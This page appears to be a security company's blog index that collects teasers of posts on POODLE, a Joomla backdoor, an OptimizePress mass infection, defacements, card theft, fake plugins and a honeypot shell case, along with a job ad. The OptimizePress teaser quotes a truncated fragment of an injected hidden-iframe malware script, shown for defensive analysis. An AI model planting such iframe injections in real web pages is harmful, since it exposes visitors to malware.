Most Common Attacks Affecting Today’s Websites

New web-based attack types and vectors are coming out every day, and this is causing businesses, communities and individuals to take security more seriously than they ever have in the past. This is a huge win for the World Wide Web and it’s a trend that is pushing technology further towards more robust and securely developed web applications.

The recent discovery of another vulnerability in SSL has led thought-leaders and developers to immediately phase out the weak aspect of the protocol. The implementation of SSLv3, and its exploitable nature, gained its marketable canine acronym POODLE for describing the ability to force users to downgrade their encryption to a breakable standard, revealing their sensitive data as if it were being passed in clear text.


Highly Effective Joomla Backdoor with Small Profile

It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie – these are truly gems. The methods that attackers are implementing are, in some instances, ingenious. I think you’ll agree that this case falls into that category.

In short, this is a highly effective backdoor that carries a small profile, making it High Speed Low Drag.

Understanding Attackers

As we’ve discussed in the past, most attackers have a pretty standard workflow when compromising websites. Here’s that process in its simplest form:

  1. Identify point of entry / weakness.
  2. Exploit the entry / weakness.
  3. Ensure that they can retain access.
  4. Cover their tracks.

I agree, nothing earth shattering, but it does help us understand what it is we need to be looking for.

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptimizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iframes that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptimizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// ohui.cgi?19" width="1" 


Sucuri Company Meeting – Brazil 2014

2013 was a great year for Sucuri! We were able to add some great services and tools like CloudProxy to help website owners and administrators fight malware. We also grew the Sucuri team quite a bit in an effort to support our products, and more importantly our customers.

We’re very excited about the future, so much so that we pulled in the team for a company meeting to kick off 2014 strong.


Friday the 13th – A Gallery of Webmaster Nightmares

This post is dedicated to all you geeky horror movie fans out there!

One morning you open your website and don’t recognize it. Something is devastatingly wrong. You wipe the sleep from your eyes, and instantly you know that you’re living your worst nightmare…

As you gain early morning focus from what you thought was a good night’s sleep, a scary face stares back at you, and declares that you’ve been hacked!

When you see it you know it’s, it’s…it’s…it’s Friday the 13th!!!


It’s always Friday the 13th for webmasters of defaced sites, regardless of what their calendar says. It becomes the most unlucky day in their webmaster life, the day when only bad things can happen.


We, at Sucuri, come across such hacked sites every day. Every day we help website owners like you survive your Friday the 13th. We restore your sites and make sure this doesn’t happen again.

When your site is finally restored, and you calm down after the stressful fight for your site, it may eventually occur to you that the defaced page was a piece of some weird modern cyber art.


OK, maybe you weren’t comparing your defacement to your favorite Van Gogh. We have seen defaced websites every day for the last few years, and after a while you start finding artistic value in some of the “hacked by..” pages you come across.

Sometimes they are disturbing and offensive, sometimes they are scary. Sometimes they are funny, and sometimes they even provide security advice.
In the end, they all reflect the sub-culture of h4x0r$.


In this post, we’d like to share our collection of screenshots of defaced websites. Lean back and submerge into the world of cyber-chaos.
Once you emerge back from the craziness, think to yourself, and ask yourself the simple question, “Am I prepared to deal with such unfortunate events?”


You can find 100 more screenshots and the whole collection on the Sucuri Facebook page.


Have you encountered such defaced pages on the Internet? Share your own website nightmare, on this eerie Friday the 13th!

Sucuri is Hiring – Employment Opportunities

It’s always an exciting time when we can reach out to our community and let folks know that there are new opportunities to join our company. That is where we find ourselves today.

We have reached a point where we need to reach out again and continue our growth trajectory. We are looking for a few good men and women in a variety of fields to join us.

Do you fit any of these?

If so, then let us know because we want to hear from you.

System Administrator (022517)

Technical Requirements:

  • Strong system administration and networking experience
  • Linux Knowledge – High
  • Nginx / Apache – High
  • OpenSSL – High
  • Shell Scripting – High
  • HIDS / IPS / IDS – High

Senior PHP Developer / Ops (022514)

Technical Requirements:

  • Senior developer who can write lean, secure PHP 5 code
  • Ability to adapt to various languages
  • Linux administration and management experience – Plus
  • Firm understanding of security principles and use of good security practices
  • Broad understanding of web architecture and scalable platforms

Senior Security Researcher (022515)

Technical Requirements:

  • Experience white-hat hacking and finding vulnerabilities in web applications / web stacks.
  • Experience with a variety of programming languages, frameworks (WordPress, Joomla, vBulletin, Wiki, etc.) and an understanding of how to exploit them.
  • Strong understanding of PHP and SQL is a plus
  • Ability to write Proof of Concepts against vulnerabilities is a plus
  • Knowledge of research and white hat security tools
  • You can take a web site, find vulnerabilities, suggest fixes and build ways to prevent that from being exploited
  • Malware decoding experience is a plus

Senior Frontend Developer (022516)

Technical Requirements:

  • Strong HTML, Javascript and CSS experience
  • Ability to effectively convert designs to functional front-end code
  • Familiarity with CMS applications (e.g., WordPress, Joomla, etc.) is a plus
  • You have built other products before and know what it takes to create responsive and intuitive design

Please submit your resume

If any of these positions sound like something you think you’d be able to excel at then we want to hear from you. Send us an email with your resume to, and let us know why you’d be awesome to work with.


Stealing Credit Cards – A WordPress and vBulletin Hack

What better way to celebrate Thanksgiving than to share an interesting case that involves two of the most popular CMS applications out there – vBulletin and WordPress.

Here is a real case that we just worked on this week, involving an attacker dead set on stealing credit card information. Enjoy!

The Environment

The client runs a fairly successful e-commerce website. They run two main applications within their architecture – vBulletin and WordPress.

vBulletin is used for their support and collaboration forums, while WordPress is used for their main website and e-commerce. This appears to be a pretty standard configuration across most larger web application environments these days.

Everything is sitting on a LAMP (Linux / Apache / MySQL / PHP) stack, so nothing too special there. For the most part, things are up to date, they might be a version or two behind, but none of it earth shattering or something worth writing home about.

In regards to security, they are running CloudFlare.

All in all, it probably sounds a lot like your environment[s].


Another Fake WordPress Plugin – And Yet Another SPAM Infection!

We clean hundreds and thousands of infected websites, and a lot of the cleanups can be considered to be somewhat “routine”. If you follow our blog, you often hear us say we’ve seen “this” numerous times, we’ve cleaned “that” numerous times.

In most cases when dealing with infected websites, we know where to look and what to remove; generally, with a quick look we can determine what’s going on. Despite our experience and passion for cleaning up a hacked website, there are always surprises lurking and waiting for us, almost every day.

Some of the most interesting routine cases we deal with are often websites with SPAM. SPAM is in the database, or the whole block of SPAM code is stored in some obscure file. We also deal with cases where the SPAM is loaded within the theme or template header, footer, index, etc. Sometimes these SPAM infections are conditional (e.g. they only appear once per IP), sometimes not.

More often than not, however, these infections are not too difficult to identify and remove. In the case we’re writing about in this post, we were able not only to remove malware, but also take a look at what’s going on behind the curtain.


Case Study: Analyzing a WordPress Attack – Dissecting the webr00t cgi shell – Part I

November 1st started like any other day on the web. Billions of requests were being shot virtually between servers in safe and not so safe attempts to access information. After months of waiting, finally one of those not so safe requests hit one of our honeypots.

We won’t get into the location of the site because it really doesn’t matter, a fact that most critics don’t realize. As is often the case, the honeypot site was quiet without much traffic and the weakness was access control.

We intentionally left the password to the site as one of the top 10 passwords; with continuous attempts, it took about 3 months before it was accessed.

This time, though, we were ready, and this is how it went...


Sucuri Expands Research Efforts with Acquisition of Unmask Parasites

Our goal at Sucuri is to be the best website security company of today and in the future.

To help build on our existing research efforts, and to expand our ability to scan websites and detect malware, we are very excited to announce the acquisition of Unmask Parasites.

Unmask Parasites is an online website security service that helps detect illicit content that hackers insert into benign web pages using various security holes. This acquisition is well aligned with our vision and commitment to offer the best website security services and products available today, and in the future.

We are also very pleased to announce that along with the acquisition, we have retained the services of Denis Sinegubko, founder of Unmask Parasites; Denis will be joining our research team.
